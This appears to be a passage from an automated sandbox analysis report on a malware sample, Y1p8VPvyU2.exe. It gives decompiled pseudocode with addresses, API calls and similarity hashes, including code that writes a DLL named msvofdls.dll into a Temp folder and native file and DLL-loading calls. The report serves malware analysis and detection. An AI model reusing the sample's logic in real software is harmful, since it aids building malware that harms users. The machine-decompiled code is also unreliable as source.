								}
							}
						}
						if(_v28 != 0xfde9) {
							_v8 = _v12;
							goto L30;
						} else {
							if(_v32 != 0) {
								E1000F6E0(_t209 + _v32 - 0x1030, _v16, _v12);
								_t211 = _t211 + 0xc;
								_v16 =  &_v4148;
								_v12 = _v12 + _v32;
							}
							_v8 = _v12;
							while(( *( &(_v16[_v8]) - 1) & 0x000000c0) == 0x80) {
								_v8 = _v8 - 1;
								_v20 = _v20 - 1;
							}
							if(( *( &(_v16[_v8]) - 1) & 0x00000080) != 0) {
								_v24 = 0;
								if(( *( &(_v16[_v8]) - 1) & 0x000000e0) == 0xc0) {
									_v24 = 1;
								}
								if(( *( &(_v16[_v8]) - 1) & 0x000000f0) == 0xe0) {
									_v24 = 2;
								}
								if(( *( &(_v16[_v8]) - 1) & 0x000000f8) == 0xf0) {
									_v24 = 3;
								}
								if(_v12 - _v8 < _v24) {
									_v8 = _v8 - 1;
								} else {
									_v8 = _v12;
								}
							}
							L30:
							_v36 = MultiByteToWideChar(_v28, 0, _v16, _v8,  &_v12344, 0x1000);
							_v44 =  &_v12344;
							if(_v28 == 0xfde9 && _v8 != _v12) {
								E1000F6E0( &_v4148,  &(_v16[_v8]), _v12 - _v8);
								_t211 = _t211 + 0xc;
								_v32 = _v12 - _v8;
							}
							goto L35;
						}
					}
					E10006F40(_a12);
					_t211 = _t211 + 4;
					if( *((intOrPtr*)( *_a12 + 4)) == 0) {
						if( *(_a12 + 4) != 0) {
							_v20 = _v20 +  *(_a12 + 4);
							goto L7;
						} else {
							break;
						}
					} else {
						break;
					}
					L37:
					 *(_a12 + 4) = 0;
				} while (1 != 0);
				return _v20;
			}




















                                      0x10007588
                                      0x1000758d
                                      0x10007594
                                      0x1000759b
                                      0x100075a2
                                      0x100075b6
                                      0x100075bb
                                      0x100075be
                                      0x100075be
                                      0x100075cc
                                      0x10007604
                                      0x1000760a
                                      0x100077e7
                                      0x100077f0
                                      0x100077f3
                                      0x10007805
                                      0x1000780a
                                      0x10007814
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x10007816
                                      0x10007616
                                      0x1000761f
                                      0x10007626
                                      0x10007628
                                      0x10007636
                                      0x10007646
                                      0x1000764b
                                      0x1000764e
                                      0x10007655
                                      0x10007657
                                      0x10007664
                                      0x1000766d
                                      0x1000766d
                                      0x10007655
                                      0x10007636
                                      0x10007677
                                      0x10007777
                                      0x00000000
                                      0x1000767d
                                      0x10007681
                                      0x10007696
                                      0x1000769b
                                      0x100076a4
                                      0x100076ad
                                      0x100076ad
                                      0x100076b3
                                      0x100076b6
                                      0x100076d4
                                      0x100076dd
                                      0x100076dd
                                      0x100076f2
                                      0x100076f4
                                      0x10007711
                                      0x10007713
                                      0x10007713
                                      0x1000772e
                                      0x10007730
                                      0x10007730
                                      0x1000774d
                                      0x1000774f
                                      0x1000774f
                                      0x1000775f
                                      0x1000776f
                                      0x10007761
                                      0x10007764
                                      0x10007764
                                      0x1000775f
                                      0x1000777a
                                      0x1000779a
                                      0x100077a3
                                      0x100077ad
                                      0x100077cc
                                      0x100077d1
                                      0x100077da
                                      0x100077da
                                      0x00000000
                                      0x100077dd
                                      0x10007677
                                      0x100075d2
                                      0x100075d7
                                      0x100075e3
                                      0x100075f1
                                      0x10007601
                                      0x00000000
                                      0x100075f3
                                      0x00000000
                                      0x100075f3
                                      0x100075e5
                                      0x00000000
                                      0x100075e5
                                      0x10007818
                                      0x1000781b
                                      0x10007827
                                      0x10007835

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID: %08x %p
                                      • API String ID: 2931989736-201491226
                                      • Opcode ID: 3ff21c5d3ad036bdee60d819defc67f78e0883bc9fdfbfc60149b250d55da2e1
                                      • Instruction ID: 48059df18655bbf468ed25d8ba14e77a1c251dfa8b0634538407f3da8604fe05
                                      • Opcode Fuzzy Hash: 3ff21c5d3ad036bdee60d819defc67f78e0883bc9fdfbfc60149b250d55da2e1
                                      • Instruction Fuzzy Hash: 109137B4D04249DFEB04CF98C994BEEBBB1FF44384F248199E5196B249C779AA40CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000416E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124keyboardCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 65%
                                      			E1000416E() {
				void* _t65;
				signed int _t70;
				void* _t81;
				void* _t109;
				void* _t111;

				if(( *( *((intOrPtr*)(_t109 + 8)) + 0x54) & 0x00020000) == 0) {
					L3:
					 *(_t109 - 0x26c) = GetKeyState(0x11) & 0x00008000;
					 *(_t109 - 0xb0) =  *(_t109 + 0x10) >> 0x00000010 & 0x0000ffff;
					if( *(_t109 - 0xb0) >= 0 ||  *( *((intOrPtr*)(_t109 + 8)) + 0x538) >= 0) {
						if( *(_t109 - 0xb0) <= 0 ||  *( *((intOrPtr*)(_t109 + 8)) + 0x538) <= 0) {
							 *( *((intOrPtr*)(_t109 + 8)) + 0x538) =  *(_t109 - 0xb0);
							goto L9;
						} else {
							goto L7;
						}
					} else {
						L7:
						 *( *((intOrPtr*)(_t109 + 8)) + 0x538) =  *( *((intOrPtr*)(_t109 + 8)) + 0x538) +  *(_t109 - 0xb0);
						L9:
						_t87 =  *((intOrPtr*)(_t109 + 8));
						if( *( *((intOrPtr*)(_t109 + 8)) + 0x538) != 0) {
							if( *(_t109 - 0x26c) == 0) {
								 *(_t109 - 0xf0) = 3;
								 *(_t109 - 0xf4) = 0;
								SystemParametersInfoW(0x68, 0, _t109 - 0xf0, 0);
								if( *(_t109 - 0xf0) != 0) {
									_t87 =  *((intOrPtr*)(_t109 + 8)) + 0x538;
									_t70 = E1000B660( *((intOrPtr*)(_t109 + 8)) + 0x538,  *((intOrPtr*)(_t109 + 8)) + 0x538,  *(_t109 - 0xf0));
									_t111 = _t111 + 8;
									 *(_t109 - 0xf4) = _t70;
								}
								if( *(_t109 - 0xf4) != 0) {
									0x10000000( *((intOrPtr*)(_t109 + 8)),  ~( *(_t109 - 0xf4)) * E1000B610(_t87,  *((intOrPtr*)(_t109 + 8))));
								}
							} else {
								if( *( *((intOrPtr*)(_t109 + 8)) + 0x48c) == 0 ||  *( *((intOrPtr*)(_t109 + 8)) + 0x490) == 0) {
									 *(_t109 - 0x50) = 0x64;
								} else {
									_t87 =  *((intOrPtr*)(_t109 + 8));
									asm("cdq");
									 *(_t109 - 0x50) =  *( *((intOrPtr*)(_t109 + 8)) + 0x48c) * 0x64 /  *( *((intOrPtr*)(_t109 + 8)) + 0x490);
								}
								 *(_t109 - 0x50) = E1000B660(_t87,  *((intOrPtr*)(_t109 + 8)) + 0x538, 0xa) +  *(_t109 - 0x50);
								if( *(_t109 - 0x50) >= 0xa &&  *(_t109 - 0x50) <= 0x1f4) {
									0x10000000( *((intOrPtr*)(_t109 + 8)),  *(_t109 - 0x50), 0x64);
								}
							}
						}
						_t65 = 0;
						L25:
						return _t65;
					}
				}
				_t81 = E10009E20( *((intOrPtr*)(_t109 + 8)),  *((intOrPtr*)(_t109 + 0xc)), _t109 + 0x10, _t109 + 0x14);
				_t111 = _t111 + 0x10;
				if(_t81 != 0) {
					goto L3;
				}
				_t65 = 0;
				goto L25;
			}








                                      0x1000417a
                                      0x1000419f
                                      0x100041ad
                                      0x100041c2
                                      0x100041cf
                                      0x100041e4
                                      0x10004215
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x100041f2
                                      0x100041f2
                                      0x10004204
                                      0x1000421b
                                      0x1000421b
                                      0x10004225
                                      0x10004232
                                      0x100042a9
                                      0x100042b3
                                      0x100042ca
                                      0x100042d7
                                      0x100042e3
                                      0x100042ea
                                      0x100042ef
                                      0x100042f2
                                      0x100042f2
                                      0x100042ff
                                      0x1000431d
                                      0x10004322
                                      0x10004234
                                      0x1000423e
                                      0x1000424c
                                      0x10004255
                                      0x1000425f
                                      0x10004262
                                      0x10004269
                                      0x10004269
                                      0x10004283
                                      0x1000428a
                                      0x1000429f
                                      0x100042a4
                                      0x100042a7
                                      0x10004232
                                      0x10004b69
                                      0x10004b6b
                                      0x10004b6f
                                      0x10004b6f
                                      0x100041cf
                                      0x1000418c
                                      0x10004191
                                      0x10004196
                                      0x00000000
                                      0x00000000
                                      0x10004198
                                      0x00000000

                                      APIs
                                      • GetKeyState.USER32(00000011), ref: 100041A1
                                      • SystemParametersInfoW.USER32 ref: 100042CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: InfoParametersStateSystem
                                      • String ID: d
                                      • API String ID: 272850323-2564639436
                                      • Opcode ID: af013151c7d25e7af5b7143f33da0088bdfd5989dda4c3ef93615b9b250b18e2
                                      • Instruction ID: 706955244737e6057f292ee1052708cc1a6e74b64e25e174ef6a0550d938cb32
                                      • Opcode Fuzzy Hash: af013151c7d25e7af5b7143f33da0088bdfd5989dda4c3ef93615b9b250b18e2
                                      • Instruction Fuzzy Hash: 81517CB4A00219EFEB14CF44DC85BEA77B1FB44385F1581A8F9099B285DB75AA84CF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10009B90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102comwindowclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBeep.USER32(00000010), ref: 10009BAC
                                      • OleGetClipboard.OLE32(00000000), ref: 10009BE3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: BeepClipboardMessage
                                      • String ID: Ignoring aspect %x
                                      • API String ID: 228258591-4055797955
                                      • Opcode ID: f4ed0627a9ade7f5ca503d752d68fc64d299010cc5684f27cf2b4fabc52ae226
                                      • Instruction ID: 2096109ce8d92f55ba0aaf4a3113f387be1e19d692349cc64a6d0ec485e1d8f7
                                      • Opcode Fuzzy Hash: f4ed0627a9ade7f5ca503d752d68fc64d299010cc5684f27cf2b4fabc52ae226
                                      • Instruction Fuzzy Hash: CE4117B4D00209EFFB00DF94D985B9EB7F1EB44395F2084A9E8059B289E3749A84DB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404C19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
							 *0x429fc0 = _t22;
							E0040592B(0x429fd8, 0x42f000);
							E00405889(0x42f000, _t22);
							E0040140B(6);
							E0040592B(0x42f000, 0x429fd8);
						}
						L11:
						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404598(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403D29(0x413);
				return 0;
			}




                                      0x00404c25
                                      0x00404c4a
                                      0x00404c6a
                                      0x00404c6d
                                      0x00404c70
                                      0x00404c87
                                      0x00404c8d
                                      0x00404c94
                                      0x00404c9b
                                      0x00404ca2
                                      0x00404ca7
                                      0x00404cad
                                      0x00000000
                                      0x00404cbd
                                      0x00404c57
                                      0x00404caa
                                      0x00404caa
                                      0x00000000
                                      0x00404caa
                                      0x00404c63
                                      0x00404c65
                                      0x00000000
                                      0x00404c65
                                      0x00404c2b
                                      0x00000000
                                      0x00000000
                                      0x00404c32
                                      0x00000000

                                      APIs
                                      • IsWindowVisible.USER32 ref: 00404C4F
                                      • CallWindowProcA.USER32 ref: 00404CBD
                                        • Part of subcall function 00403D29: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403D3B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                      • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                                      • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                      • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f78 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                      0x004024b0
                                      0x004024b0
                                      0x004024b3
                                      0x004024ce
                                      0x004024b5
                                      0x004024b7
                                      0x004024bc
                                      0x004024c3
                                      0x004024d5
                                      0x0040264e
                                      0x0040264e
                                      0x004024db
                                      0x004024ed
                                      0x004015a6
                                      0x004015a8
                                      0x00000000
                                      0x004015ae
                                      0x004015a8
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll, xrefs: 004024BC, 004024E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FileWritelstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll
                                      • API String ID: 427699356-3367961579
                                      • Opcode ID: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                      • Instruction ID: 2b901ff19b85a4e76c04b2b8852d4c7aed572531c5b12b0aefee0adfe1f835b5
                                      • Opcode Fuzzy Hash: 3ef39aa938cb109eefe55d27aafa72d95b37ec9a2dd30eed20e934897815d4b9
                                      • Instruction Fuzzy Hash: 7EF0E9B2A54240BFDB00EBB19D49EAB76589B00344F20443BB142F50C2D6BC8D819B2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405465, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00405465(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                      0x00405466
                                      0x00405470
                                      0x00405472
                                      0x00405479
                                      0x00405481
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405481
                                      0x00405483
                                      0x00405488

                                      APIs
                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Y1p8VPvyU2.exe,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 0040546B
                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Y1p8VPvyU2.exe,C:\Users\user\Desktop\Y1p8VPvyU2.exe,80000000,00000003), ref: 00405479
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-1669384263
                                      • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                      • Instruction ID: d448c4330aaee4e1d52c8fc1992275a879f371812311106428750dc828cdcd14
                                      • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                      • Instruction Fuzzy Hash: 6CD09EA241D9A06EE30256149C04B9F6A48DB16711F194462E580A6191C2785D818BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405577, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00405577(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                      0x00405583
                                      0x00405585
                                      0x004055ad
                                      0x00405592
                                      0x00405597
                                      0x004055a2
                                      0x00000000
                                      0x004055bf
                                      0x004055ab
                                      0x004055ab
                                      0x00000000

                                      APIs
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                      • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                      • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
                                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                      • Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
                                      • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                      • Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: Y1p8VPvyU2.exe PID: 1304 Parent PID: 7100 Y1p8VPvyU2.exeCOMMON

                                      Executed Functions

                                      Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                      0x00418693
                                      0x0041869f
                                      0x004186a7
                                      0x004186ac
                                      0x004186b2
                                      0x004186cd
                                      0x004186d5
                                      0x004186d9

                                      APIs
                                      • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1:A$r=A$r=A
                                      • API String ID: 2738559852-4243674446
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 50%
                                      			E00409B40(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				char _v12;
				char _v16;
				char _v536;
				void* _t15;
				intOrPtr _t17;
				char _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						_push( &_v16);
						_push( &_v12);
						_push(0);
						LdrLoadDll(0); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                      0x00409b5c
                                      0x00409b5f
                                      0x00409b64
                                      0x00409b69
                                      0x00409b73
                                      0x00409b78
                                      0x00409b7b
                                      0x00409b7d
                                      0x00409b85
                                      0x00409b8a
                                      0x00409b8a
                                      0x00409b91
                                      0x00409b99
                                      0x00409b9c
                                      0x00409b9e
                                      0x00409ba6
                                      0x00409bad
                                      0x00409bae
                                      0x00409bb2
                                      0x00000000
                                      0x00409bb4
                                      0x00409bba
                                      0x00409b6e
                                      0x00409b6e
                                      0x00409b6e

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E004185DA(void* __eax, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t23;
				void* _t33;
				void* _t37;
				void* _t38;

				_t38 =  <=  ? _t37 : _t37;
				_push(_t38);
				_push(_t38);
				_t17 = _v0;
				_t3 = _t17 + 0xc40; // 0xc40
				E004191E0(_t33, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t23;
			}








                                      0x004185dc
                                      0x004185df
                                      0x004185e0
                                      0x004185e3
                                      0x004185ef
                                      0x004185f7
                                      0x0041862d
                                      0x00418631

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: ee2b5ba64afc0f84d0141d7c52f8fd841546f9b265e9f1ed23069c6d29bd0d65
                                      • Instruction ID: 6e43e8784cf3705c405577dbee2cb728afe2da6cfb97e368a4996e2c9e1a0fce
                                      • Opcode Fuzzy Hash: ee2b5ba64afc0f84d0141d7c52f8fd841546f9b265e9f1ed23069c6d29bd0d65
